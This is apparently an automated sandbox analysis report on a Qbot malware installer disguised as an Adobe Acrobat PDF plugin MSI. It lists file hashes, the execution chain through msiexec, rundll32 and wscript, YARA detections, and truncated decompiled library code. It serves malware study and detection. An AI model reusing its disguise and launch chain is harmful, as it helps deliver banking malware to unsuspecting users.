SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC5E20CC9F13FECB6.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5060877643473185
Encrypted:	false
SSDEEP:	48:58PhfuRc06WXJ8FT5K0gMPduLMS5kArD6uLMSI818lP7AWMN:0hf1fFT3TPRtfA
MD5:	430F2ADF3561DDB478079AF68E971D68
SHA1:	7431BA57FB0275B6276BBA7370A317D67552D8B6
SHA-256:	8A709B97AFBFAA9E5CD5D3C566F95D370FE69AC31260A6F3C2FF82619F3D1026
SHA-512:	5A3904A81D986EE27F31D27383BB70BE01C709BFF580B7CD2AF184F8C8539439A3F38821B5C0D32B42F57DF0B92BC771B5ED7264082F842D19F346D3667C669A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFDD7490D2FF8A1B23.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.06947604271114201
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOGljlnucCRjQVky6lS:2F0i8n0itFzDHFZRRS
MD5:	D429E7962EAB07E07C545C296E8B0F35
SHA1:	9AC331509B3E15434194BAECFA89488D380435FC
SHA-256:	14064733FE0126C92AE648CE46DD3AF9820F19CA4F87B6FFCD9134C3A4FD19EE
SHA-512:	BF7726A85BAFFE69B531188332BBE26F1ADFF215BAB9CB3FFA26B2FC1A6D6D337328E1670526C5040AF4C6F39E838456DE85834EBB97A704A641A76132970259
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Acrobat PDF Browser Plugin 4.8.25, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Acrobat PDF Browser Plugin, Template: Intel;1033, Revision Number: {880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}, Create Time/Date: Tue May 30 14:29:16 2023, Last Saved Time/Date: Tue May 30 14:29:16 2023, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Entropy (8bit):	7.919635795804226
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	r3zg12.msi
File size:	507904
MD5:	665afc8f8b7972f427fe1bd90d263032
SHA1:	cc36e48f383750eb9416961b52ee3100b6e30688
SHA256:	d764436caf7114d880f982d208bd9514a433772dcac851f27c510d1597e26edd
SHA512:	d30110dc240790a1f0c15df31069d361f80df327c258dd3305e70eb9ee3814c285ab6290e88e4072b375f7dac3d183d22aba29cb94fdd7db937c4399c18ad37e
SSDEEP:	12288:vn+NgINNEcfjVRMigNFoILI8KviLjvhAN+S0w3:vnX9gjVRMDqH8fL1+35
TLSH:	21B42359660A6371C4C826B2E73E77CFAAA27C5507038433C33B72DE1D775B81A663A1
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: msiexec.exePID: 7048, Parent PID: 3452

General

Target ID:	0
Start time:	18:06:19
Start date:	30/05/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\r3zg12.msi"
Imagebase:	0x7ff729140000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 1948, Parent PID: 580

General

Target ID:	1
Start time:	18:06:19
Start date:	30/05/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff729140000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 3156, Parent PID: 1948

General

Target ID:	2
Start time:	18:06:21
Start date:	30/05/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Imagebase:	0x7ff709920000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6980, Parent PID: 1948

General

Target ID:	3
Start time:	18:06:21
Start date:	30/05/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
Imagebase:	0x7ff715d10000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 676, Parent PID: 3156

General

Target ID:	4
Start time:	18:06:21
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Imagebase:	0x80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.374584964.0000000004AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wermgr.exePID: 4340, Parent PID: 676

General

Target ID:	5
Start time:	18:06:24
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\wermgr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wermgr.exe
Imagebase:	0x50000
File size:	191904 bytes
MD5 hash:	CCF15E662ED5CE77B5FF1A7AAE305233
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: rundll32.exePID: 676, Parent PID: 3156COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	10
Total number of Limit Nodes:	0

Executed Functions

Function 1002A4FB Relevance: 1.5, APIs: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?), ref: 1002A524

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 485ff5df04f8ee2b44346524c68e78e88d06071511fcdec404aceb0375cb2ab2
Instruction ID: 00f80fa798212d279aa3a4e3fc9d35ec11821ce49b1a2f68508c6e23295b72c3
Opcode Fuzzy Hash: 485ff5df04f8ee2b44346524c68e78e88d06071511fcdec404aceb0375cb2ab2
Instruction Fuzzy Hash: 0DE09A70D08529EFCB20DB84E180A9DBBB1FB0A325FA54481ED51A6211CB35EE85AF10

Uniqueness

Uniqueness Score: -1.00%

Function 1002A61E Relevance: 1.3, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00002F44,?,00002F44,00000002), ref: 1002A6BA

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c8a91bb3f52504b34851642bff6f911aa0904a126f9de841362222e4fb7c4aba
Instruction ID: 8a4044d8f8fd50a6a134e65f0457b5eacbbcbdc5684dba151f3aee4cf353d954
Opcode Fuzzy Hash: c8a91bb3f52504b34851642bff6f911aa0904a126f9de841362222e4fb7c4aba
Instruction Fuzzy Hash: B81142B1D1C205EFDB30DA90FCD974DA6B8E71A204FF94026AE0065242EF2518C4BA25

Uniqueness

Uniqueness Score: -1.00%

Function 1002A4E1 Relevance: 1.3, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,00007E7E,00007E7E), ref: 1002A5FE

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0641292201ec43dba3f4cc9da24f777aeb42a299be4718644466048f13d02087
Instruction ID: 758a69f25ca6f6719b3215040b18abb149fc83eeb57a41baf1fe90a80d390342
Opcode Fuzzy Hash: 0641292201ec43dba3f4cc9da24f777aeb42a299be4718644466048f13d02087
Instruction Fuzzy Hash: F8012571D08929EFDF66CE80E988A9E7AB5FB06204FA000A1ED0162121DB359A90FB40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1002F110 Relevance: 39.2, APIs: 13, Strings: 9, Instructions: 668COMMON

Download Yara Rule

APIs

mv_small_strptime.MAIN ref: 1002F188

Strings

%M:%S, xrefs: 1002F744
%H:%M:%S, xrefs: 1002F2CA
gfff, xrefs: 1002F5CF
%Y - %m - %d, xrefs: 1002F251
%J:%M:%S, xrefs: 1002F17C
now, xrefs: 1002F233
%H%M%S, xrefs: 1002F2E5
%Y%m%d, xrefs: 1002F26D
%H:%M, xrefs: 1002F68A

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_small_strptime
String ID: %H%M%S$%H:%M$%H:%M:%S$%J:%M:%S$%M:%S$%Y - %m - %d$%Y%m%d$gfff$now
API String ID: 1704653723-929505383
Opcode ID: 70551c3f807884e4d46f3108702462cb1203eb33ef54204aec50387936ae1137
Instruction ID: 646b59ec4b146e931ed9e50608571c6f79c7907caae039c014e067c05dcc172a
Opcode Fuzzy Hash: 70551c3f807884e4d46f3108702462cb1203eb33ef54204aec50387936ae1137
Instruction Fuzzy Hash: 8042F471A083458FD714CF28D48076AFBE2EFC5384F95897EE889C7352E631D9468B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000D4D0 Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 306
COMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E1000D4D0(void* __ebx, void* __edi, void* __esi) {
				char _t142;
				intOrPtr _t144;
				signed int _t145;
				signed int _t148;
				char _t160;
				signed int _t163;
				signed int _t166;
				unsigned int _t178;
				signed int _t182;
				char* _t191;
				char _t192;
				char* _t206;
				void* _t211;
				unsigned int _t227;
				intOrPtr _t238;
				intOrPtr _t241;
				signed int _t243;
				signed int _t250;
				signed int _t272;
				intOrPtr _t273;
				char* _t280;
				unsigned int _t284;
				intOrPtr _t285;
				signed int _t289;
				signed int _t292;
				void* _t293;
				char* _t329;
				unsigned int _t330;
				unsigned int _t332;
				signed int _t333;
				signed int _t337;
				unsigned int _t341;
				unsigned int _t351;
				char* _t353;
				intOrPtr _t379;
				char* _t380;
				signed int _t381;
				signed int _t382;
				char* _t386;
				unsigned int _t387;
				signed int _t388;
				char* _t390;
				signed int _t395;
				void* _t397;
				signed int _t399;
				signed int _t402;
				void* _t403;
				char _t420;
				signed int _t421;
				char* _t423;
				signed int _t425;
				char* _t426;
				char* _t428;
				void* _t431;
				char** _t432;
				char** _t434;
				char** _t435;
				intOrPtr* _t438;
				void* _t440;

				_push(__edi);
				_push(__esi);
				_push(__ebx);
				_t432 = _t431 - 0x2c;
				_t423 = _t432[0x10];
				_t432[6] = _t432[0x11];
				_t142 =  *_t423;
				_t440 = _t142 - 2;
				if(_t440 == 0) {
					L60();
					if(_t432[6] >= 0) {
						goto L8;
					} else {
						goto L14;
					}
					goto L12;
				} else {
					if(_t440 > 0) {
						if(_t142 != 3) {
							_t144 = 0xffffffea;
							goto L12;
						} else {
							_t191 = _t432[6];
							_t434 =  &(_t432[0xb]);
							_t353 = _t423;
							_pop(_t273);
							_pop(_t403);
							_pop(_t389);
							_pop(_t427);
							_t428 = _t353;
							_t390 = _t191;
							_push(_t403);
							_push(_t273);
							_t435 = _t434 - 0x4c;
							_t192 =  *_t353;
							if(_t192 == 3) {
								_t206 = _t428[4];
								_t280 =  &(_t206[ !((((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[8] - (_t353[8] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f) + (((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + (((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) & 0x33333333) + (_t353[0xc] - (_t353[0xc] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f))]);
								goto L74;
							} else {
								_t332 = _t353[8];
								if(_t192 != 2) {
									_t435[5] = 0x29a;
									_t435[1] = 0;
									 *_t435 = 0;
									_t435[4] = "libavutil/channel_layout.c";
									_t435[3] = "channel_layout->order == AV_CHANNEL_ORDER_CUSTOM";
									_t435[2] = "Assertion %s failed at %s:%d\n";
									L10023A40();
									L1009DB98();
									_t438 = _t435 - 0x41c;
									 *((intOrPtr*)(_t438 + 0x418)) = _t273;
									_t238 =  *((intOrPtr*)(_t438 + 0x424));
									_t379 =  *((intOrPtr*)(_t438 + 0x428));
									if(_t238 != 0 || _t379 == 0) {
										 *((intOrPtr*)(_t438 + 8)) = _t379;
										_t285 = _t438 + 0x10;
										 *((intOrPtr*)(_t438 + 4)) = _t238;
										 *_t438 = _t285;
										L100089A0();
										 *((intOrPtr*)(_t438 + 4)) = _t285;
										 *_t438 =  *((intOrPtr*)(_t438 + 0x420));
										_t241 = E1000D4D0(_t285, _t390, _t403);
										if(_t241 >= 0) {
											_t241 =  *((intOrPtr*)(_t438 + 0x14));
										}
									} else {
										_t241 = 0xffffffea;
									}
									return _t241;
								} else {
									_t420 = _t353[4];
									_t380 = 0;
									_t280 = 0xffffffff;
									if(_t420 > 0) {
										do {
											_t206 =  *_t332 - 0x400;
											if(_t206 > 0x3ff) {
												goto L67;
											} else {
												if(_t380 > 0) {
													if( *((intOrPtr*)(_t332 - 0x18)) - 0x400 > 0x3ff || _t206 != _t380) {
														goto L72;
													} else {
														goto L66;
													}
												} else {
													if(_t206 > 0x3ff) {
														goto L67;
													} else {
														if(_t206 == _t380) {
															L66:
															_t280 = _t380;
															goto L67;
														} else {
															goto L72;
														}
													}
												}
											}
											goto L91;
											L67:
											_t380 =  &(_t380[1]);
											_t332 = _t332 + 0x18;
										} while (_t380 != _t420);
										L74:
										if(_t280 < 0) {
											goto L72;
										} else {
											asm("pxor xmm0, xmm0");
											asm("cvtsi2sd xmm0, ebx");
											asm("sqrtsd xmm0, xmm0");
											asm("cvttsd2si eax, xmm0");
											_t406 =  &(_t206[1]) *  &(_t206[1]);
											if(_t406 !=  &(_t280[1])) {
												goto L72;
											} else {
												_t435[2] = _t206;
												_t435[1] = "ambisonic %d";
												 *_t435 = _t390;
												L100089C0();
												_t329 = _t428[4];
												if(_t329 > _t406) {
													_t211 = 0;
													do {
														 *((intOrPtr*)(_t435 + _t211 + 0x28)) = 0;
														 *((intOrPtr*)(_t435 + _t211 + 0x2c)) = 0;
														_t211 = _t211 + 8;
													} while (_t211 < 0x18);
													if( *_t428 == 3) {
														_t330 = _t428[8];
														_t435[0xa] = 1;
														_t284 = _t428[0xc];
														_t435[0xc] = _t330;
														_t435[0xd] = _t284;
														_t227 = (((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 8);
														_t406 = _t227 >> 0x10;
														_t435[0xb] = ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) & 0x0000003f) + (_t227 + (_t227 >> 0x00000010) & 0x0000003f);
													} else {
														_t284 = 2;
														_t435[0xa] = 2;
														_t435[0xb] = _t329 - _t406;
														_t435[0xc] = _t428[8] + (_t406 + _t406 * 2) * 8;
													}
													 *_t435 = _t390;
													_t435[2] = 1;
													_t435[1] = 0x2b;
													L10008D20();
													_t435[1] = _t390;
													 *_t435 =  &(_t435[0xa]);
													E1000D4D0(_t284, _t390, _t406);
												}
												return 0;
											}
										}
									} else {
										L72:
										return 0xffffffea;
									}
								}
							}
						}
					} else {
						if(_t142 == 0) {
							_t148 = _t423[4];
							goto L59;
						} else {
							_t421 = _t423[8];
							_t243 = 4;
							_t333 = 0;
							_t289 = _t423[0xc];
							_t381 = 0;
							while((_t333 ^ _t289 | _t243 ^ _t421) != 0) {
								_t381 =  &(1[_t381]);
								if(_t381 == 0x1f) {
									L14:
									_t145 = _t423[4];
									if(_t145 != 0) {
										_t432[2] = _t145;
										_t432[1] = "%d channels (";
										 *_t432 = _t432[6];
										L100089C0();
										_t395 = _t423[4];
										if(_t395 > 0) {
											_t425 = 0;
											_t386 = _t423;
											goto L19;
											do {
												do {
													L19:
													if(_t425 >= _t395) {
														L57:
														_t432[1] = 0x100aeacf;
														 *_t432 = _t432[6];
														L100089C0();
														goto L24;
													} else {
														_t160 =  *_t386;
														if(_t160 == 2) {
															_t292 =  *(_t386[8] + (_t425 + _t425 * 2) * 8);
															_t250 = _t292 - 0x400;
															if(_t425 != 0) {
																_t432[4] = _t292;
																_t432[1] = 0x100aeacf;
																 *_t432 = _t432[6];
																L100089C0();
																_t292 = _t432[4];
															}
															if(_t250 > 0x3ff) {
																goto L53;
															} else {
																goto L51;
															}
														} else {
															if(_t160 == 3) {
																_t178 = _t386[8];
																_t432[4] = _t178;
																_t432[5] = _t386[0xc];
																_t397 = _t395 - (((((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000010) + (((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) & 0x0000003f) + ((((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 